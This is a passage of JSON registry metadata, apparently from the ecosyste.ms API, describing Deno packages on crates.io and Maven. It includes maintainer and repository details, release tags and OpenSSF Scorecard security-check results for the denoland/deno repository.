ersions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:36.998Z","updated_at":"2022-11-07T18:29:36.998Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:29.270Z","updated_at":"2023-07-18T22:41:29.270Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14130659,"name":"org.mvnpm.at.deno:win32-x64","ecosystem":"maven","description":"win32-x64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":17,"first_release_published_at":"2025-10-20T11:18:27.000Z","latest_release_published_at":"2026-08-08T02:21:25.000Z","latest_release_number":"2.9.5","last_synced_at":"2026-08-29T01:24:07.541Z","created_at":"2026-03-27T05:16:02.663Z","updated_at":"2026-08-29T01:24:07.542Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/win32-x64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/win32-x64/","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2",